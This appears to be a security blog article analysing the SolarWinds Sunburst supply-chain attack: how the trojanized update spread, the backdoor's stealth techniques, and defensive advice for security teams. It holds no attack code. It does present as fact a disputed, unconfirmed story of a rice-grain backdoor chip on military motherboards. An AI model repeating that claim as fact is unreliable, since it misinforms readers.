The SolarWinds Sunburst attack is basically a jackpot for anyone who’s been looking for a perfect example of an elaborate, stealthy, possibly state-sponsored, meticulously planned, and patiently executed attack using previously unheard-of techniques. Not only did attackers succeed in implanting an advanced backdoor into systems used by Fortune 500 companies and government agencies, but they also did it by modifying installation files for an official update. The “trojanized” update was then downloaded by over 18,000 customers between March and June 2020.
SolarWinds Sunburst attack reveals infinite attack surface
While the software that’s been made famous for all the wrong reasons is a network monitoring product from SolarWinds called Orion, supply-chain attacks or third-party attacks are becoming a very serious problem. Open-source software is great, but there’s definitely a tradeoff that can’t be ignored. In other words, you can’t just take the good and not work on the bad. When you download software, a service, or an app off the Internet, it needs to be thoroughly vetted for vulnerabilities before you add it into your application.
Today almost every organization in the world uses third-party hardware and software, which a lot of the time are in turn made up of a combination of different third-party products. If you imagine a tree table with each device or software branching out into its different components, on-premises and in the cloud, that’s how big the attack surface of a typical enterprise is today. Similar to the Sunburst attack, it wasn’t that long ago that GE suffered a severely damaging data breach caused by a third party while Marriott International suffered two in as many years.
So, if supply-chain attacks have become commonplace, what’s so special about the Sunburst attack on SolarWinds? Well, for starters, early indications point to at least four years of planning involving not just the purchase of abandoned internet domains to appear authentic but also code-signing a malicious backdoor with the correct SolarWinds certificates. That backdoor (also called Sunburst) was then added to installation files for a SolarWinds update and uploaded to the official update server. While official estimates claim only 18,000 customers downloaded the corrupt updates, those customers include the Office of the President of the United States.
Once downloaded, the backdoor then defies logic by going into an initial period of inactivity for about two weeks, making it a lot harder to detect before it goes to work gathering information, running commands called Jobs, and contacting its command-and-control servers (C2s). Information gathered includes domain name, network interfaces, running processes or services, and installed drivers, while job commands include everything from the transfer and execution of files to rebooting and disabling systems. After effectively gaining control over the infected environment and performing numerous checks, the backdoor makes contact with its C2s for further instructions.
Super stealth mode
To call this attack complex would be an understatement as there are layers upon layers of complexity that are still being investigated. In an attempt to summarize the characteristics of Sunburst, it basically avoids detection by not doing all the things that make malware detectable. It doesn’t cause a noticeable increase in the size of the shell module where it’s added, it doesn’t start working immediately, it communicates extremely slowly, it has no x86 shellcode, and it avoids systems with drivers, processes, or services related to anti-malware products. It does this by running all system information against a blocklist that has domain names in addition to drivers, processes, and services to avoid.
Another interesting hoodwink that Sunburst manages to pull off is contacting its C2s by what looks like a simple DNS request but is actually a request encoded with information about the infected system. Additionally, the traffic between the backdoor and C2s mimics standard SolarWinds API communication protocol, in particular, the Orion Improvement Program (OIP) protocol, so all communication looks like legitimate network traffic. The attackers also made sure to authenticate all lateral activity with valid user credentials that are believed to be stolen
As an example of the layers of complexity that exist here, researchers uncovered another backdoor called Supernova, as well as a previously unseen memory-only dropper dubbed Teardrop, both of which are still being investigated. And yet another malware connected to the SolarWinds Sunburst, this one dubbed Raindrop, has recently been identified.
Picking up the pieces
The first thing you have to realize about an attack like the SolarWinds Sunburst incident is that the good guys pretty much have the odds stacked against them. They got to be alert and prepared all the time as opposed to the other guys who are at liberty to meticulously plan an attack for four years and strike whenever they feel like it. Additionally, while we’ve seen a lot of third-party attacks of late, this one has truly woken up the world to the danger of supply-chain attacks and permanently changed the boundaries of global IT security.
For attackers, it’s all about finding the weakest link in your chain of vendors, while security teams need to go through every single piece of hardware and software that’s bought from a third-party. Hardware hacks can be even more difficult to detect, like the backdoor chip that was the size of a grain of rice that was discovered on motherboards used by the U.S. Department of Defense datacenters, the CIA’s drone operations, and the onboard networks of Navy warships. The backdoor chip was only detected after a third-party was hired to scrutinize security and discovered that the chip wasn’t part of the original board’s design.
The good news is that security teams have an advantage, too, if they make use of it. They have all the time in the world to study the battleground before the proverbial battle. They have complete access to their own environments way in advance of any attacks, which as an advantage, is pretty significant. While attackers are planning attacks, security teams need to be actively studying their own attack surfaces so they know where the weakest links are before anyone else. Chaos-engineering is a great way to find your own weaknesses and vulnerabilities before anyone else does.
Security teams, when not dealing with breaches, need to be constantly testing their own defenses and proactively mapping out all organizational assets and endpoints that are exposed to the Internet, including all third-party products. A good way to filter software vendors that can’t meet requirements is to create a standard of security best practices that need to be followed by all software vendors in order to qualify to be purchased. Contextually aware security and user behavior analytics are also good ways to detect malware with nonstandard behavior, as we saw in the Sunburst attack.
SolarWinds Sunburst attack proves malicious is the new norm
While the SolarWinds Sunburst attack has got every security team digging around to check if any similar backdoors exist in their environments, the fact that a lot are probably still undetected in the wild is a sobering thought. Organizations can no longer make assumptions about network traffic based on communication protocols, and every action needs to be assumed guilty until proven innocent, even if it comes from a trusted application. Most importantly, organizations need to stop growing faster than their security teams develop, and if need be, slow down so security can catch up. Lastly, focus on proactive security that’s relevant to the current threat landscape.
Featured image: Shutterstock